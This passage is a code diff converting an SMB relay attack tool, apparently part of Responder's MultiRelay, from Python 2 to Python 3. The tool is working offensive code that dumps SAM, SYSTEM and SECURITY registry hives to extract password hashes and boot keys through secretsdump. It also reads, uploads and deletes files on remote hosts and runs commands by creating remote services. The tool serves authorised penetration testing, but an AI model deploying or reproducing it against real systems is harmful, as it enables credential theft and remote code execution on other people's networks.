- s.send(buffer1)
- data = s.recv(2048)
+ if data[8:10] == b"\x04\x00":
+ head = SMBHeader(cmd="\x06",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x13\x00")
+ t = DeleteFileRequest(File=Filename)
+ t.calculate()
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(2048)
- if data[8:10] == "\x06\x00":
- head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
- t = OpenAndX(File=Filename, OpenFunc="\x01\x00")
- t.calculate()
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- data = s.recv(2048)
- return data, s, Output
+ if data[8:10] == b"\x06\x00":
+ head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
+ t = OpenAndX(File=Filename, OpenFunc="\x01\x00")
+ t.calculate()
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(2048)
+ return data, s, Output
def DeleteAFile(Filename, data, s, Host):
##Start with a Tree connect on C$
- head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Host+"\\C$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
##DeleteFileRequest.
- if data[8:10] == "\x75\x00":
- head = SMBHeader(cmd="\x06",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x13\x00")
- t = DeleteFileRequest(File=Filename)
- t.calculate()
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- data = s.recv(2048)
+ if data[8:10] == b"\x75\x00":
+ head = SMBHeader(cmd="\x06",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x13\x00")
+ t = DeleteFileRequest(File=Filename)
+ t.calculate()
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(2048)
- if data[8:10] == "\x06\x21":
- time.sleep(1)
- head = SMBHeader(cmd="\x06",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x13\x00")
- t = DeleteFileRequest(File=Filename)
- t.calculate()
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- data = s.recv(2048)
+ if data[8:10] == b"\x06\x21":
+ time.sleep(1)
+ head = SMBHeader(cmd="\x06",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x13\x00")
+ t = DeleteFileRequest(File=Filename)
+ t.calculate()
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(2048)
- if data[8:10] == "\x06\x21":
- print "[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process."
- print "[+] Try taskkill /F /IM process_name, then delete the file."
- return data, s
+ if data[8:10] == b"\x06\x21":
+ print("[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process.")
+ print("[+] Try taskkill /F /IM process_name, then delete the file.")
+ return data, s
- if data[8:10] == "\x06\x34":
- print "[+] Delete Failed. File not found."
- return data, s
+ if data[8:10] == b"\x06\x34":
+ print("[+] Delete Failed. File not found.")
+ return data, s
- if data[8:10] == "\x06\x00":
- head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
- t = OpenAndX(File=Filename, OpenFunc="\x01\x00")
- t.calculate()
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- data = s.recv(2048)
- return data, s
+ if data[8:10] == b"\x06\x00":
+ head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
+ t = OpenAndX(File=Filename, OpenFunc="\x01\x00")
+ t.calculate()
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(2048)
+ return data, s
def GrabKeyValue(s, f, handler, data, keypath):
## DCE/RPC OpenKey.
- if data[8:10] == "\x25\x00":
+ if data[8:10] == b"\x25\x00":
ContextHandler = handler
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCEWinRegOpenKey(ContextHandle=ContextHandler,Key=keypath)
w.calculate()
x = SMBDCEPacketData(Opnum="\x0f\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC Query Info.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to read the key\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to read the key\n")
return ModifySMBRetCode(data)
- ContextHandler = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandler = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCEWinRegQueryInfoKey(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
Value = data[104:120].decode('utf-16le')
## DCE/RPC CloseKey.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to close the key\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to close the key\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x05\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
return Value, data
def SaveKeyToFile(Filename, Key, handler, f, data, s):
## DCE/RPC WinReg Create Key.
- if data[8:10] == "\x25\x00":
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x25\x00":
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCEWinRegCreateKey(ContextHandle=handler, KeyName = Key)
w.calculate()
x = SMBDCEPacketData(Opnum="\x06\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC WinReg Save Key.
- if data[8:10] == "\x25\x00":
- ContextHandler = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x25\x00":
+ ContextHandler = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCEWinRegSaveKey(ContextHandle=ContextHandler, File=Filename)
w.calculate()
x = SMBDCEPacketData(Opnum="\x14\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
return data, s, f
def OpenHKLM(data, s, f):
## DCE/RPC WinReg OpenHKLM.
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCEWinRegOpenHKLMKey()
x = SMBDCEPacketData(Opnum="\x02\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- handler = data[84:104]
+ handler = data[84:104].decode('latin-1')
return data, s, handler, f
def OpenHKCU(data, s, f):
## DCE/RPC WinReg OpenHKCU.
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCEWinRegOpenHKCUKey()
x = SMBDCEPacketData(Opnum="\x04\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- handler = data[84:104]
+ handler = data[84:104].decode('latin-1')
return data, s, handler, f
def ConvertValuesToBootKey(JDSkew1GBGData):
+ JDSkew1GBGData = JDSkew1GBGData.decode('latin-1')
Key = ""
Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7]
for i in range(len(JDSkew1GBGData)):
Key += JDSkew1GBGData[Xored[i]]
- print 'BootKey: %s' % Key.encode("hex")
+ print('BootKey: %s' % codecs.encode(Key.encode('latin-1'), 'hex').decode('latin-1'))
return Key
##########Dump Hashes#############
def DumpHashes(data, s, Host):
try:
- stopped = False
- data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
+ SaveAKey(data, s, Host, "SAM")
+ time.sleep(0.5)
+ SaveAKey(data, s, Host, "SYSTEM")
+ time.sleep(0.5)
+ SaveAKey(data, s, Host, "SECURITY")
+ time.sleep(0.5)
+ #Let's call secretsdump.py
+ print("[+] Calling SecretsDump\n")
+ Hashes = DumpSecrets(None, None, None, None)
+ Results = Hashes.dump(sam=SaveSam_Path+"./"+Host+"-SAM.tmp", security=SaveSam_Path+"./"+Host+"-SECURITY.tmp", system=SaveSam_Path+"./"+Host+"-SYSTEM.tmp", outfile=SaveSam_Path+"./"+Host)
- if f == "PipeNotAvailable":
- print "The Windows Remote Registry Service is sleeping, waking it up..."
- time.sleep(3)
- data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
-
- if f == "PipeNotAvailable":
- print "Retrying..."
- time.sleep(5)
- data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
-
- if f == "ServiceNotFound":
- stopped = True
- data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
- data,s,f = StartWinregService(f, Host, data, s)
- data,s = CloseFID(f, data,s)
- #We should be all good here.
- data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
-
- data,s,handler,f = OpenHKLM(data,s,f)
-
- ##Error handling.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n"
- return ModifySMBRetCode(data)
- ##Grab the keys
- if data[8:10] == "\x25\x00":
- JD, data = GrabKeyValue(s, f, handler, data, "SYSTEM\\CurrentControlSet\\Control\\Lsa\\JD")
- Skew1, data = GrabKeyValue(s, f, handler, data, "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Skew1")
- Data, data = GrabKeyValue(s, f, handler, data, "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Data")
- GBG, data = GrabKeyValue(s, f, handler, data, "SYSTEM\\CurrentControlSet\\Control\\Lsa\\GBG")
-
- #Dump bootkey, then finish up.
- BootKey = ConvertValuesToBootKey(str(JD+Skew1+GBG+Data).decode("hex"))
- RandomFile = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.tmp'
- data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+RandomFile, "SAM", handler, f, data, s)
- data,s = CloseFID(f, data, s)
- data,s,f = SMBOpenFile("\\Windows\\Temp\\"+RandomFile, "C", Host, RW, data, s)
- data,s,Output = ReadAndDelete(f, "\\Windows\\Temp\\"+RandomFile, data, s)
-
- #If the service was stopped before we came...
- if stopped:
- data,s = SMBOpenPipe(Host, data, s)#Get a new IPC$ TID.
- data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
- data,s,f = StopWinregService(f, Host, data, s)
- data,s = CloseFID(f, data,s)
- data = ModifySMBRetCode(data)
-
- #After everything has been cleaned up, we write to file and call creddump
- WriteOutputToFile(Output, "./Sam-"+Host+".tmp")
- try:
- Hashes = dump_file_hashes(BootKey, SaveSam_Path+"./Sam-"+Host+".tmp")
- WriteOutputToFile(Hashes, "./Hash-Dump-"+Host+".txt")
- except:
- print "[+] Live dump failed, is python-crypto installed? "
- pass
- print "[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt"
- return data
+ print("[+] The hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt")
+ return data
except:
- #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
- print "[+] Something went wrong, try something else."
- return ModifySMBRetCode(data)
+ #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
+ return ModifySMBRetCode(data)
##########Save An HKLM Key And Its Subkeys#############
def SaveAKey(data, s, Host, Key):
try:
- stopped = False
- data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
+ stopped = False
+ data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
- if f == "PipeNotAvailable":
- print "The Windows Remote Registry Service is sleeping, waking it up..."
- time.sleep(3)
- data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
+ if f == "PipeNotAvailable":
+ print("The Windows Remote Registry Service is sleeping, waking it up...")
+ time.sleep(3)
+ data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
- if f == "PipeNotAvailable":
- print "Retrying..."
- time.sleep(5)
- data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
+ if f == "PipeNotAvailable":
+ print("Retrying...")
+ time.sleep(5)
+ data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
- if f == "ServiceNotFound":
- stopped = True
- data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
- data,s,f = StartWinregService(f, Host, data, s)
- data,s = CloseFID(f, data,s)
- #We should be all good here.
- data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
+ if f == "ServiceNotFound":
+ stopped = True
+ data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
+ print("Starting Windows Remote Registry...")
+ data,s,f = StartWinregService(f, Host, data, s)
+ data,s = CloseFID(f, data,s)
+ #We should be all good here.
+ data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
- ##Error handling.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n"
- return ModifySMBRetCode(data)
+ ##Error handling.
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n")
+ return ModifySMBRetCode(data)
- data,s,handler,f = OpenHKLM(data,s,f)
+ data,s,handler,f = OpenHKLM(data,s,f)
- data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s)
- if data[8:10] != "\x25\x00":
- print "[+] Something went wrong, try something else."
- return ModifySMBRetCode(data)
- data,s = CloseFID(f, data, s)
- data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s)
- data,s,Output = ReadAndDelete(f, "\\Windows\\Temp\\"+Key+".tmp", data, s)
+ data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s)
+ if data[8:10] != b"\x25\x00":
+ print("[+] Something went wrong, try something else.")
+ return ModifySMBRetCode(data)
+ data,s = CloseFID(f, data, s)
+ data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s)
+ data,s,Output = ReadAndDelete(f, "\\Windows\\Temp\\"+Key+".tmp", data, s)
- #If the service was stopped before we came...
- if stopped:
- data,s = SMBOpenPipe(Host, data, s)#Get a new IPC$ TID.
- data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
- data,s,f = StopWinregService(f, Host, data, s)
- data,s = CloseFID(f, data,s)
- data = ModifySMBRetCode(data)
+ #If the service was stopped before we came...
+ if stopped:
+ data,s = SMBOpenPipe(Host, data, s)#Get a new IPC$ TID.
+ data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
+ data,s,f = StopWinregService(f, Host, data, s)
+ data,s = CloseFID(f, data,s)
+ data = ModifySMBRetCode(data)
- #After everything has been cleaned up, we write the output to a file.
- WriteOutputToFile(Output, Host+"-"+Key+".tmp")
- print "[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp"
- return data
+ #After everything has been cleaned up, we write the output to a file.
+ WriteOutputToFile(Output, Host+"-"+Key+".tmp")
+ print("[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp")
+ return data
except:
- #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
- print "[+] Something went wrong, try something else."
- return ModifySMBRetCode(data)
+ #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
+ print("[+] Something went wrong, try something else.")
+ return ModifySMBRetCode(data)
##########ReadAFile#############
def ReadFile(data, s, File, Host):
try:
- File = File.replace("/","\\")
- data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
- data,s,Output = GrabAndRead(f, File, data, s)
- print Output
- return ModifySMBRetCode(data) ##Command was successful, ret true.
+ File = File.replace("/","\\")
+ data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
+ data,s,Output = GrabAndRead(f, File, data, s)
+ print(Output)
+ return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
- print "[+] Read failed. Remote filename was typed correctly?"
- return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
+ print("[+] Read failed. Remote filename was typed correctly?")
+ return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
def GetAfFile(data, s, File, Host):
try:
- File = File.replace("/","\\")
- data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
- data,s,Output = GrabAndRead(f, File, data, s)
- WriteOutputToFile(Output, Host+"-"+File)
- print "[+] Done."
- return ModifySMBRetCode(data) ##Command was successful, ret true.
+ File = File.replace("/","\\")
+ data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
+ data,s,Output = GrabAndRead(f, File, data, s)
+ WriteOutputToFile(Output, Host+"-"+File)
+ print("[+] Done.")
+ return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
- print "[+] Get file failed. Remote filename was typed correctly?"
- return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
+ print("[+] Get file failed. Remote filename was typed correctly?")
+ return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########UploadAFile#############
def WriteFile(data, s, File, FileSize, FileContent, Host):
try:
- File = File.replace("/","\\")
- data,s,f = SMBOpenFileForWriting(File, FileSize, FileContent, "C", Host, RW, data, s)
- data,s = UploadAndWrite(f, FileSize, FileContent, data, s)
- return ModifySMBRetCode(data) ##Command was successful, ret true.
+ File = File.replace("/","\\")
+ data,s,f = SMBOpenFileForWriting(File, FileSize, FileContent, "C", Host, RW, data, s)
+ data,s = UploadAndWrite(f, FileSize, FileContent, data, s)
+ return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
- print "[+] Write failed."
- return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
+ print("[+] Write failed.")
+ return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########DeleteAFile############
def DeleteFile(data, s, File, Host):
try:
- File = File.replace("/","\\")
- data,s = DeleteAFile(File, data, s, Host)
- data,s = CloseTID(data, s)
- return ModifySMBRetCode(data) ##Command was successful, ret true.
+ File = File.replace("/","\\")
+ data,s = DeleteAFile(File, data, s, Host)
+ data,s = CloseTID(data, s)
+ return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
- print "[+] Delete operation failed.\n[+] Something went wrong."
- data,s = CloseTID(data, s)
- return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
+ print("[+] Delete operation failed.\n[+] Something went wrong.")
+ data,s = CloseTID(data, s)
+ return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########Psexec#############
def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, FileName):
try:
- RandomFName = GenerateRandomFileName()
- WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt"
- LogFile = "\\Windows\\Temp\\"+RandomFName+".txt"
- Command = RunPath+" \""+Command+"\" \""+WinTmpPath+"\""
- ServiceNameChars = GenerateServiceName()
- ServiceIDChars = GenerateServiceID()
+ RandomFName = GenerateRandomFileName()
+ WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt"
+ LogFile = "\\Windows\\Temp\\"+RandomFName+".txt"
+ Command = RunPath+" \""+Command+"\" \""+WinTmpPath+"\""
+ ServiceNameChars = GenerateServiceName()
+ ServiceIDChars = GenerateServiceID()
- data,s = SMBOpenPipe(Host, data, s)
- data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
- data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s)
- data,s = CloseFID(f, data,s)
- time.sleep(1)
- data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s)
- data,s,Output = ReadAndDelete(f, LogFile, data, s)
- print Output
- data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
+ data,s = SMBOpenPipe(Host, data, s)
+ data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
+ data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s)
+ data,s = CloseFID(f, data,s)
+ time.sleep(1)
+ data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s)
+ data,s,Output = ReadAndDelete(f, LogFile, data, s)
+ print(Output)
+ data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
- Logs.info('Command executed:')
- Logs.info(clientIP+","+Username+','+Command)
+ Logs.warning('Command executed:')
+ Logs.warning(clientIP+","+Username+','+Command)
- return data
+ return data
except:
- #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
- print "[+] Something went wrong, try something else."
- return ModifySMBRetCode(data)
+ #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
+ print("[+] Something went wrong, try something else.")
+ return ModifySMBRetCode(data)
##########Runas#############
def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName):
try:
- Command = Command.replace('"', '\'')
- RandomFName = GenerateRandomFileName()
- WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt"
- LogFile = "\\Windows\\Temp\\"+RandomFName+".txt"
- Command = "%windir%\\Temp\\"+FileName+" \""+Command+"\" \""+WinTmpPath+"\""
- ServiceNameChars = GenerateServiceName()
- ServiceIDChars = GenerateServiceID()
+ Command = Command.replace('"', '\'')
+ RandomFName = GenerateRandomFileName()
+ WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt"
+ LogFile = "\\Windows\\Temp\\"+RandomFName+".txt"
+ Command = "%windir%\\Temp\\"+FileName+" \""+Command+"\" \""+WinTmpPath+"\""
+ ServiceNameChars = GenerateServiceName()
+ ServiceIDChars = GenerateServiceID()
- data,s = SMBOpenPipe(Host, data, s)
- data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
- data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s)
- data,s = CloseFID(f, data,s)
- time.sleep(1)
- data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s)
